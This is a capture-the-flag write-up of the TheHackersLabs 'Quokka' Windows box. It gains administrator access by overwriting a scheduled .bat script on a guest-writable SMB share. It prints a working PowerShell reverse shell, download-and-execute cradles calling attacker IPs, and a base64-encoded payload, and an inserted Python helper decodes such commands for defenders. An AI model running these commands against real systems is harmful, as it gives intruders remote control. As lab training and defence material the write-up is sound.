Quokka – TheHackersLabs

  • OS: Linux
  • Difficulty: Easy
  • Platform: TheHackersLabs



Summary

“Quokka” is an easy machine from the TheHackersLabs platform. After inspecting the shares exposed by the machine's SMB service, we find a .bat script that is executed every minute. Since the guest account has write permissions on that share, we overwrite the script with a malicious one and get access to the victim machine. The shell we obtain belongs to a privileged user, pwning the machine.


User

Starting with a quick Nmap scan:

❯ sudo nmap -sS -p- --min-rate=5000 --open -n -Pn -vvv 10.20.1.145

We can see multiple ports open. Among them: 80 (HTTP, Microsoft Internet Information Services), 135 (Microsoft RPC), 445 (Server Message Block, SMB) and 5985 (Windows Remote Management, WinRM).

Checking their versions and running the default recognition scripts with the -sVC flags returns:

❯ sudo nmap -sVC -p80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670 10.20.1.145

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-03 04:53 -03
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.20.1.145
Host is up (0.00032s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Portfolio y Noticias Tech de Quokka
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Datacenter 14393 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 08:00:27:FF:0F:BA (Oracle VirtualBox virtual NIC)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-11-03T07:53:59
|_  start_date: 2024-11-03T07:44:25
|_nbstat: NetBIOS name: WIN-VRU3GG3DPLJ, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:ff:0f:ba (Oracle VirtualBox virtual NIC)
| smb-os-discovery:
|   OS: Windows Server 2016 Datacenter 14393 (Windows Server 2016 Datacenter 6.3)
|   Computer name: WIN-VRU3GG3DPLJ
|   NetBIOS computer name: WIN-VRU3GG3DPLJ\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-11-03T08:53:59+01:00
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -19m58s, deviation: 34m37s, median: 0s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.16 seconds

Visiting http://10.20.1.145 (the victim machine's HTTP site) shows what looks like a blog about cybersecurity.


But the site does not present much more information beyond that topic.

From the Nmap output (smb-security-mode reports account_used: guest) we can see that the SMB service allows guest login. We can use this access to first check whether any shares are available, with NetExec:

❯ nxc smb 10.20.1.145 -u 'guest' -p '' --shares

SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:WIN-VRU3GG3DPLJ) (signing:False) (SMBv1:True)
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  [+] WIN-VRU3GG3DPLJ\guest: (Guest)
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  [*] Enumerated shares
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  Share           Permissions     Remark
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  -----           -----------     ------
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  ADMIN$                          Admin remota
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  C$                              Recurso predeterminado
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  Compartido      READ,WRITE
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  IPC$                            IPC remota

and we do have a share called Compartido, on which the guest account has READ and WRITE permissions.

We can also use NetExec and --rid-brute to see if we can enumerate users:

❯ nxc smb 10.20.1.145 -u 'guest' -p '' --rid-brute
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:WIN-VRU3GG3DPLJ) (signing:False) (SMBv1:True)

SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  [+] WIN-VRU3GG3DPLJ\guest: (Guest)
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  500: WIN-VRU3GG3DPLJ\Administrador (SidTypeUser)
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  501: WIN-VRU3GG3DPLJ\Invitado (SidTypeUser)
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  503: WIN-VRU3GG3DPLJ\DefaultAccount (SidTypeUser)
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  513: WIN-VRU3GG3DPLJ\Ninguno (SidTypeGroup)
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  1000: WIN-VRU3GG3DPLJ\Omar (SidTypeUser)
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  1001: WIN-VRU3GG3DPLJ\0mar (SidTypeUser)

We have 2 potential users: Omar and 0mar.

We can then use smbclient to enumerate the files within the Compartido share with the command:

❯ smbclient -U 'guest%' //10.20.1.145/Compartido -c 'recurse; ls'

  .                                   D        0  Sun Nov  3 05:22:23 2024
  ..                                  D        0  Sun Nov  3 05:22:23 2024
  Documentación                      D        0  Sun Oct 27 11:33:53 2024
  Logs                                D        0  Sun Oct 27 11:33:54 2024
  Proyectos                           D        0  Sun Oct 27 11:33:54 2024
<SNIP>

Those are a lot of files.

I download all of them by connecting to this share with smbclient as the guest user and running:

❯ smbclient -U 'guest%' //10.20.1.145/Compartido/ -c 'recurse ON; prompt OFF; mget *'

getting file \Documentación\Diagrama_Flujo.pptx of size 0 as Documentación/Diagrama_Flujo.pptx (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \Documentación\Informe_Proyecto.pdf of size 0 as Documentación/Informe_Proyecto.pdf (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \Documentación\Archivos_Antiguos\Antiguo_Informe.docx of size 0 as Documentación/Archivos_Antiguos/Antiguo_Informe.docx (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
<SNIP>

Eventually, after inspecting some files, we find a script named mantenimiento.bat with the content:

@echo off
:: Backup system maintenance
:: This script is executed every minute

REM Hint: Maybe there is something more here...

:: Reverse shell to Kali
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "iex(New-Object Net.WebClient).DownloadString('http://192.168.1.36:8000/shell.ps1')"

:: End of script
exit

The hint says this script is executed every minute, and we also have WRITE permissions over the share. What if we replace this .bat script with one of our own? For this we will create two files: cradle.ps1 and rev.ps1. I usually split it this way on Windows machines just to check whether Windows Defender blocks the reverse shell. First, grab a reverse shell PowerShell one-liner from Nishang and adapt it to our attacker machine:

$client = New-Object System.Net.Sockets.TCPClient('10.20.1.110',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

where 10.20.1.110 is our attacker IP and 443 is the port on which I will listen with netcat to obtain the reverse shell. I save this code into a file named rev.ps1.

Then, I create a file named cradle.ps1 with the content:

IEX(New-Object Net.WebClient).downloadString('http://10.20.1.110:8080/rev.ps1')

Encode this payload as base64 over UTF-16LE so it can be passed to PowerShell's -enc flag:

❯ cat cradle.ps1 | iconv -t utf-16le | base64 -w0; echo

SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADIAMAAuADEALgAxADEAMAA6ADgAMAA4ADAALwByAGUAdgAuAHAAcwAxACcAKQAKAA==

and write a file named exploit.bat with the content:

@echo off

powershell -NoP -NonI -W Hidden -Exec Bypass -Command "powershell -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADIAMAAuADEALgAxADEAMAA6ADgAMAA4ADAALwByAGUAdgAuAHAAcwAxACcAKQAKAA=="

exit
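On the defender's side, the exploit.bat line above is what ends up in the CommandLine field of a process-creation record (Sysmon Event ID 1 or Security Event ID 4688). The following Python helper is an added example, not code from the original writeup: it reverses the iconv/base64 step, recognising -EncodedCommand and the prefixes powershell.exe accepts for it, decoding the UTF-16LE payload and pulling out the URL the cradle would fetch. The sample command line is constructed from exploit.bat above.

```python
import base64
import re

# Constructed sample: the line from exploit.bat above, as it would be recorded in
# the CommandLine field of a Sysmon Event ID 1 or Security Event ID 4688 record.
SAMPLE_CMDLINE = (
    'powershell -NoP -NonI -W Hidden -Exec Bypass -Command "powershell -enc '
    'SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A'
    'ZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADIAMAAuADEA'
    'LgAxADEAMAA6ADgAMAA4ADAALwByAGUAdgAuAHAAcwAxACcAKQAKAA=="'
)

URL_RE = re.compile(r"https?://[^\s'\"<>()]+")
CRADLE_RE = re.compile(r"(?i)\biex\b|invoke-expression|downloadstring|downloadfile")

def is_encoded_flag(token: str) -> bool:
    """powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
    -en, -enc, ...), so keying on '-enc' alone misses variants; -Exec/-ep must not match."""
    t = token.lower()
    return t.startswith("-e") and (t[2:] == "c" or "ncodedcommand".startswith(t[2:]))

def decode_encoded_command(blob: str) -> str:
    """The payload is base64 over UTF-16LE text, exactly what the
    iconv -t utf-16le | base64 -w0 pipeline above produces."""
    raw = base64.b64decode(blob.strip("\"'"), validate=True)
    return raw.decode("utf-16-le")

def extract_encoded_scripts(cmdline: str) -> list:
    """Return every decoded -EncodedCommand payload in a command line, including
    one nested inside a -Command "..." string as in exploit.bat."""
    scripts = []
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        if is_encoded_flag(flag.strip("\"'")):
            try:
                scripts.append(decode_encoded_command(value))
            except (ValueError, UnicodeDecodeError):
                pass  # the token after the flag was not a valid payload; skip it
    return scripts

def triage(cmdline: str) -> dict:
    """What a defender wants from the record: the decoded script(s), any URL they
    would fetch, and whether they look like a download cradle."""
    scripts = extract_encoded_scripts(cmdline)
    urls = sorted({u for s in scripts for u in URL_RE.findall(s)})
    return {"scripts": scripts, "urls": urls,
            "download_cradle": any(CRADLE_RE.search(s) for s in scripts)}

if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINE))
```

Run against this writeup's command line, the decoded script is the cradle.ps1 content and the extracted URL is the attacker's rev.ps1 location, which is the indicator to block and hunt for.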

Start a netcat listener on port 443 in one terminal and, in another, expose the files with a temporary Python HTTP server on port 8080:

❯ ls -la && python3 -m http.server 8080

total 16
drwxrwxr-x 2 gunzf0x gunzf0x 4096 Nov  3 05:46 .
drwxrwxr-x 5 gunzf0x gunzf0x 4096 Nov  3 04:49 ..
-rw-rw-r-- 1 gunzf0x gunzf0x   80 Nov  3 05:46 cradle.ps1
-rw-rw-r-- 1 gunzf0x gunzf0x  501 Nov  3 05:46 rev.ps1
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

Finally, since the hint says mantenimiento.bat runs every minute, upload exploit.bat as mantenimiento.bat with smbclient, overwriting the original file:

❯ smbclient -U 'guest%' //10.20.1.145/Compartido/ -c 'cd Proyectos/Quokka/Código; put exploit.bat mantenimiento.bat'

putting file exploit.bat as \Proyectos\Quokka\Código\mantenimiento.bat (298.8 kb/s) (average 298.8 kb/s)

We can verify that our file has been uploaded by checking the timestamps of the files:

❯ smbclient -U 'guest%' //10.20.1.145/Compartido/ -c 'cd Proyectos/Quokka/Código; ls'

  .                                   D        0  Sun Oct 27 11:58:54 2024
  ..                                  D        0  Sun Oct 27 11:58:54 2024
  index.html                          A       52  Sun Oct 27 11:33:54 2024
  mantenimiento - copia.bat           A     1252  Sun Oct 27 11:41:43 2024
  mantenimiento.bat                   A      306  Sun Nov  3 05:58:38 2024
  README.md                           A       56  Sun Oct 27 11:33:54 2024

                7735807 blocks of size 4096. 4637866 blocks available

The timestamp of mantenimiento.bat differs from the others, so the file has been modified.

After a few seconds we get a request in our Python HTTP server and a shell as the administrador user:

❯ rlwrap nc -lvnp 443

listening on [any] 443 ...
connect to [10.20.1.110] from (UNKNOWN) [10.20.1.145] 49746
whoami

win-vru3gg3dplj\administrador

PS C:\Windows\system32>

This is a privileged user. GG.

We can finally read both flags:

PS C:\Windows\system32> type C:\Users\0mar\Desktop\user.txt

9OWi***************

PS C:\Windows\system32> type C:\Users\Administrador\Desktop\admin.txt
j9eC********************

~Happy Hacking